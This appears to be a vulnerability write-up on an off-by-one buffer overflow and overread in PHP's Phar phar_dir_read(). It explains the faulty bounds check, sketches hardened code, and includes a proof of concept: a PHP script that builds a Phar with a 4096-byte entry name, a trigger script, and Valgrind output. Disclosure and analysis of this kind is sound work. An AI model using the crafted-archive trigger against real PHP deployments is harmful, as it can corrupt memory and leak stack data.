[Advanced] Buffer overflow and overread in Phar PHP

The mishandling of buffers within the function phar_dir_read()


Background

In the intricate landscape of software development, meticulous attention to detail is paramount, especially when it comes to managing buffers. However, even the most seasoned developers can encounter pitfalls.

In this article, we dig into a critical issue in the function phar_dir_read(), where mishandled buffers set off a chain reaction that ends in a buffer overflow and creates the potential for remote code execution (RCE). Let's explore the details of this bug and its implications.

Quick overview of the buf reference

In simple terms, "buf" refers to a buffer: a region of memory used to hold data temporarily. Buffers are commonly used in programming to store file contents, network data, or any other data that needs to be processed.

The term "offset" refers to a position within a buffer or memory region, counted in bytes from its start. The first byte is at offset 0, so a buffer of N bytes has valid offsets 0 through N - 1.
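To make the two terms concrete, here is a minimal C sketch of a bounds-checked write. The helper names offset_in_bounds and checked_store are made up for illustration and do not come from PHP.

```c
#include <stdbool.h>
#include <stddef.h>

/* Returns true when `offset` addresses a byte inside a buffer of `size` bytes.
 * Valid offsets run from 0 to size - 1; `size` itself is one past the end. */
static bool offset_in_bounds(size_t size, size_t offset)
{
    return offset < size;
}

/* Hypothetical helper: stores `value` at `offset` only when the offset is valid. */
static bool checked_store(char *buf, size_t size, size_t offset, char value)
{
    if (!offset_in_bounds(size, offset)) {
        return false; /* refuse the out-of-bounds write */
    }
    buf[offset] = value;
    return true;
}
```

For an 8-byte buffer, checked_store() accepts offset 7 and refuses offset 8. The bug discussed in this article is a write that skips this kind of check.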

Overview of phar_dir_read

The phar_dir_read() function is a part of the PHP Phar extension, which is used for creating and manipulating Phar archives. These archives are essentially PHP libraries or applications packaged into a single file for easy distribution and deployment.

The phar_dir_read() function is specifically responsible for reading the entries of a directory within a Phar archive. Each time a directory handle on a Phar archive is read, for example through readdir(), this function is invoked and copies the name of the next entry into a php_stream_dirent structure supplied by the caller.

However, this function mishandles the buffer it is given, which leads to both a buffer overflow and a buffer overread. The length checks on the entry name do not match the size of the destination buffer, so a crafted archive can make PHP write and read outside of it.

Therefore, it's crucial for developers to thoroughly review and test functions like phar_dir_read() to ensure that they handle buffers securely.

Consider this snippet:

/**
 * Function: phar_dir_read
 * Description: Used to read directory entries from a Phar directory handle opened with opendir().
 */
static ssize_t phar_dir_read(php_stream *stream, char *buf, size_t count) /* {{{ */
{
    size_t bytes_to_read;
    HashTable *dir_data = (HashTable *)stream->abstract;
    zend_string *dir_entry;
    zend_ulong index;

    if (HASH_KEY_NON_EXISTENT == zend_hash_get_current_key(dir_data, &dir_entry, &index)) {
        return 0;
    }

    zend_hash_move_forward(dir_data);
    bytes_to_read = MIN(ZSTR_LEN(dir_entry), count);

    if (bytes_to_read == 0 || count < ZSTR_LEN(dir_entry)) {
        return 0;
    }

    memset(buf, 0, sizeof(php_stream_dirent));
    memcpy(((php_stream_dirent *) buf)->d_name, ZSTR_VAL(dir_entry), bytes_to_read);
    ((php_stream_dirent *) buf)->d_name[bytes_to_read + 1] = '\0';

    return sizeof(php_stream_dirent);
}
/* }}} */

There are a few potential issues:

The conditional statement bytes_to_read == 0 || count < ZSTR_LEN(dir_entry) is insufficient. When it evaluates to false, all it guarantees is that count >= ZSTR_LEN(dir_entry).

Moreover, because of the assignment bytes_to_read = MIN(ZSTR_LEN(dir_entry), count), bytes_to_read is then equal to ZSTR_LEN(dir_entry). If the length of the filename (ZSTR_LEN(dir_entry)) matches the size of php_stream_dirent, which is 4096 on most Linux systems, then ZSTR_LEN(dir_entry) == count == bytes_to_read == sizeof(php_stream_dirent).

Now look at the line ((php_stream_dirent *) buf)->d_name[bytes_to_read + 1] = '\0';. Assuming sizeof(php_stream_dirent) is 4096, the valid offsets of buf are 0 through 4095, so this line writes at offset 4097, the second byte past the end of buf. The intent was presumably to index with bytes_to_read instead of bytes_to_read + 1. Even with this correction there is still a problem, because the write would land at offset 4096, which is also outside the bounds of buf. In addition, the memcpy fills all 4096 bytes of d_name with the filename, so no NUL terminator is left inside the buffer and any later read of the name runs past its end. Together, these lead to a potential stack information leak and a buffer write overflow.
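The index arithmetic above can be checked without touching any memory. The sketch below only mirrors the calculation from the snippet; DIRENT_SIZE is an assumed value for sizeof(php_stream_dirent), and terminator_index and bytes_past_end are hypothetical helper names.

```c
#include <stddef.h>

#define DIRENT_SIZE 4096          /* assumed sizeof(php_stream_dirent) */
#define REJECTED ((size_t)-1)     /* marks entries stopped by the early return */

#ifndef MIN
#define MIN(a, b) ((a) < (b) ? (a) : (b))
#endif

/* Index at which the snippet writes its NUL terminator, or REJECTED when
 * the early-return check fires. No buffer is accessed here. */
static size_t terminator_index(size_t name_len, size_t count)
{
    size_t bytes_to_read = MIN(name_len, count);

    if (bytes_to_read == 0 || count < name_len) {
        return REJECTED;
    }
    return bytes_to_read + 1;
}

/* How far past the end of a DIRENT_SIZE-byte buffer an index lies
 * (0 when the index is in bounds or the entry was rejected). */
static size_t bytes_past_end(size_t index)
{
    if (index == REJECTED || index < DIRENT_SIZE) {
        return 0;
    }
    return index - DIRENT_SIZE + 1;
}
```

With name_len and count both 4096, terminator_index() gives 4097, which bytes_past_end() reports as 2 bytes past the end. Under the same assumptions a 4095-byte name gives index 4096, one byte past the end, so the maximum-length name is not the only problematic case.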

Both the memset operation and the return value rely on the assumption that count == sizeof(php_stream_dirent). In theory, any caller that passes a smaller count would trigger a buffer overflow in the memset itself. No such callers were identified within PHP, but third-party extensions could be affected.
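One way to close all of these gaps is sketched below. It is not the upstream PHP patch, only an illustration under stated assumptions: sketch_dirent stands in for php_stream_dirent with a 4096-byte d_name, and the entry name is passed in directly instead of being taken from a hash table.

```c
#include <stddef.h>
#include <string.h>
#include <sys/types.h> /* ssize_t */

#define SKETCH_MAXPATHLEN 4096 /* assumption: matches MAXPATHLEN on Linux */

/* Stand-in for php_stream_dirent (assumed layout: a single name array). */
typedef struct {
    char d_name[SKETCH_MAXPATHLEN];
} sketch_dirent;

/* Hardened variant of the read logic:
 *  - rejects callers whose buffer is not exactly one dirent,
 *  - rejects names that leave no room for the NUL terminator,
 *  - writes the terminator at index name_len, not name_len + 1. */
static ssize_t sketch_dir_read(char *buf, size_t count,
                               const char *name, size_t name_len)
{
    sketch_dirent *ent = (sketch_dirent *)buf;

    if (count != sizeof(sketch_dirent)) {
        return -1; /* memset below would not match the caller's buffer */
    }
    if (name_len == 0 || name_len >= sizeof(ent->d_name)) {
        return 0;  /* empty name, or no space left for '\0' */
    }

    memset(ent, 0, sizeof(*ent));
    memcpy(ent->d_name, name, name_len);
    ent->d_name[name_len] = '\0';

    return (ssize_t)sizeof(sketch_dirent);
}
```

The key design choice is comparing the name length against the size of d_name rather than against count, so the terminator always fits inside the structure. Whether an oversized name should be skipped, truncated, or reported as an error is a policy decision that this sketch does not try to settle.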

Understanding the sizeof(php_stream_dirent)

The expression sizeof(php_stream_dirent) returns the size, in bytes, of the data structure php_stream_dirent. In this specific context, the size is 4096 bytes.

The data structure php_stream_dirent represents a directory entry within the PHP stream layer. In PHP 8.0 it holds a single member, the character array d_name, which is MAXPATHLEN bytes long. It stores the name of the entry and nothing else, so the size of the structure equals the size of d_name.

On Linux, MAXPATHLEN normally resolves to PATH_MAX, which is 4096. That is why sizeof(php_stream_dirent) is 4096 on most Linux systems, and why the valid offsets into d_name run from 0 to 4095. The value comes from the maximum path length, not from the block size of the underlying file system.

This size may differ on other operating systems, where the maximum path length is defined differently, so the exact offsets discussed here apply to platforms where it is 4096.
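The relationship between the structure and its size can be reproduced with a small stand-in. This is a sketch that assumes the PHP 8.0 layout, in which the structure contains only a path-sized name array; demo_dirent and the two helpers are hypothetical names, and the fallback value for PATH_MAX is an assumption for builds where limits.h does not expose it.

```c
#include <limits.h>
#include <stddef.h>

#ifndef PATH_MAX
#define PATH_MAX 4096 /* assumed fallback; typical Linux value */
#endif

/* Stand-in for php_stream_dirent: one name array sized to the path limit. */
typedef struct {
    char d_name[PATH_MAX];
} demo_dirent;

/* Size of the whole structure in bytes. */
static size_t demo_dirent_size(void)
{
    return sizeof(demo_dirent);
}

/* Highest index that may legally be written in d_name. */
static size_t demo_last_valid_index(void)
{
    return sizeof(((demo_dirent *)0)->d_name) - 1;
}
```

Because the array is the only member and char has no alignment padding, the structure is exactly PATH_MAX bytes and its last valid index is PATH_MAX - 1, that is 4095 when PATH_MAX is 4096.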

In this context, "offset 4097" means that the write is attempted 4097 bytes from the beginning of the buffer.

In the line ((php_stream_dirent *) buf)->d_name[bytes_to_read + 1] = '\0';, buf is cast to a pointer to php_stream_dirent. The expression ((php_stream_dirent *) buf)->d_name[bytes_to_read + 1] addresses the element of the d_name array one position after index bytes_to_read. The write is meant to NUL-terminate the name, but the terminator belongs at index bytes_to_read itself, so the + 1 is an off-by-one error.

In this case, the computed index lies beyond the bounds of the buffer (buf), which can result in memory corruption and potential security vulnerabilities. This situation is referred to as a buffer overflow, where data is written beyond the allocated memory space.

Proof of Concept

I built a reproducer against PHP 8.0, configured with ./configure --enable-debug --disable-all --enable-phar --with-valgrind and compiled with gcc (GCC) 13.1.1 20230429.

This script creates the Phar file used for this Proof of Concept (PoC):

<?php
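// One less than the maximum path length; the trailing 'B' added below
// brings the entry name to exactly PHP_MAXPATHLEN bytes
$maxPathLength = PHP_MAXPATHLEN - 1;

// Create a new Phar archive (writing requires phar.readonly=0,
// for example by running php with -d phar.readonly=0)
$phar = new Phar('myarchive.phar');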

// Start buffering changes
$phar->startBuffering();

// Add a file to the Phar archive with a path length of PHP_MAXPATHLEN - 1 characters followed by 'B'
$filePath = str_repeat('A', $maxPathLength).'B';
$fileContent = 'This is the content of the file.';
$phar->addFromString($filePath, $fileContent);

// Stop buffering changes
$phar->stopBuffering();
?>

Trigger the buffer overflow and overread using this script:

<?php
// Define the Phar archive path
$pharPath = "phar://./myarchive.phar";

// Open the Phar archive
$handle = opendir($pharPath);

// Read the contents of the Phar archive
$file = readdir($handle);

// Close the Phar archive
closedir($handle);

// Output the result
var_dump($file);
?>

When executed in Valgrind, specifically by running valgrind ./sapi/cli/php trigger.php, you'll encounter two Valgrind complaints:

==42575== Conditional jump or move depends on uninitialised value(s)
==42575==    at 0x4847ED8: strlen (vg_replace_strmem.c:501)
==42575==    by 0x53BE9C: zif_readdir (dir.c:389)
==42575==    by 0x6D05C4: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:1295)
==42575==    by 0x742F7D: execute_ex (zend_vm_execute.h:55163)
==42575==    by 0x747848: zend_execute (zend_vm_execute.h:59523)
==42575==    by 0x696376: zend_execute_scripts (zend.c:1694)
==42575==    by 0x5F6D45: php_execute_script (main.c:2546)
==42575==    by 0x788A53: do_cli (php_cli.c:949)
==42575==    by 0x789ADB: main (php_cli.c:1337)
==42575== 
==42575== Syscall param write(buf) points to uninitialised byte(s)
==42575==    at 0x4AA2BC4: write (write.c:26)
==42575==    by 0x7875EA: sapi_cli_single_write (php_cli.c:261)
==42575==    by 0x78768D: sapi_cli_ub_write (php_cli.c:293)
==42575==    by 0x611034: php_output_op (output.c:1082)
==42575==    by 0x60F2B7: php_output_write (output.c:261)
==42575==    by 0x5B3B0D: php_var_dump (var.c:120)
==42575==    by 0x5B432A: zif_var_dump (var.c:218)
==42575==    by 0x6D031A: ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER (zend_vm_execute.h:1234)
==42575==    by 0x742F6D: execute_ex (zend_vm_execute.h:55159)
==42575==    by 0x747848: zend_execute (zend_vm_execute.h:59523)
==42575==    by 0x696376: zend_execute_scripts (zend.c:1694)
==42575==    by 0x5F6D45: php_execute_script (main.c:2546)

The first complaint arises because the strlen() call in readdir() reads past the end of the d_name buffer, which contains no NUL terminator within its bounds.

The second complaint occurs when var_dump() outputs the name, which now includes uninitialized stack data.
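The overread behind both complaints comes from trusting that a fixed-size name field is terminated. A bounded check avoids that assumption. The sketch below uses only memchr from the C standard library; is_nul_terminated and bounded_length are hypothetical helpers, not PHP functions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* True when a NUL byte exists inside the first field_size bytes. */
static bool is_nul_terminated(const char *field, size_t field_size)
{
    return memchr(field, '\0', field_size) != NULL;
}

/* Length of the string in `field`, never reading past field_size bytes.
 * Returns field_size when no terminator is found. */
static size_t bounded_length(const char *field, size_t field_size)
{
    const char *nul = memchr(field, '\0', field_size);

    return nul ? (size_t)(nul - field) : field_size;
}
```

A consumer that called something like bounded_length() on d_name instead of strlen() would stop at the end of the array even when the terminator is missing, rather than walking into neighbouring stack memory.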

Valgrind does not flag the stack buffer write overflow, but examination of memory through tools like GDB may reveal overwritten sections of the stack.
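As an alternative to inspecting the stack in GDB, the stray write can be observed safely by replaying the same sequence of writes inside a larger arena whose tail is filled with guard bytes. This is a simulation under assumptions, not PHP code: DIRENT_SIZE is the assumed structure size, the name is replaced by a run of 'A' bytes, and replay_overflow is a hypothetical helper.

```c
#include <stddef.h>
#include <string.h>

#define DIRENT_SIZE 4096 /* assumed sizeof(php_stream_dirent) */
#define GUARD_SIZE  16   /* extra room so the stray write stays inside the arena */
#define GUARD_BYTE  0xAA

/* Replays the snippet's writes for a name of name_len bytes and returns the
 * arena offset of the first clobbered guard byte, or -1 when the guard is
 * intact (including the case where the entry is rejected up front). */
static long replay_overflow(size_t name_len)
{
    static unsigned char arena[DIRENT_SIZE + GUARD_SIZE];
    size_t count = DIRENT_SIZE;
    size_t bytes_to_read = name_len < count ? name_len : count;
    size_t i;

    memset(arena, GUARD_BYTE, sizeof(arena));
    if (bytes_to_read == 0 || count < name_len) {
        return -1; /* same early return as the snippet */
    }

    memset(arena, 0, DIRENT_SIZE);     /* memset(buf, 0, sizeof(dirent)) */
    memset(arena, 'A', bytes_to_read); /* stands in for the memcpy of the name */
    arena[bytes_to_read + 1] = '\0';   /* the faulty terminator write */

    for (i = DIRENT_SIZE; i < sizeof(arena); i++) {
        if (arena[i] != GUARD_BYTE) {
            return (long)i;
        }
    }
    return -1;
}
```

For a 4096-byte name the first modified guard byte is at offset 4097, while offset 4096 keeps its guard value. That untouched byte is why a later strlen() keeps reading past the name: nothing inside the 4096-byte structure terminates it.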

In terms of impact, exploiting this vulnerability is challenging and heavily reliant on the targeted application. However, in theory, it could be achieved through a combination of stack information leaks and buffer write overflows. Individuals inspecting the contents of untrusted Phar files could potentially be affected.

Jay ☕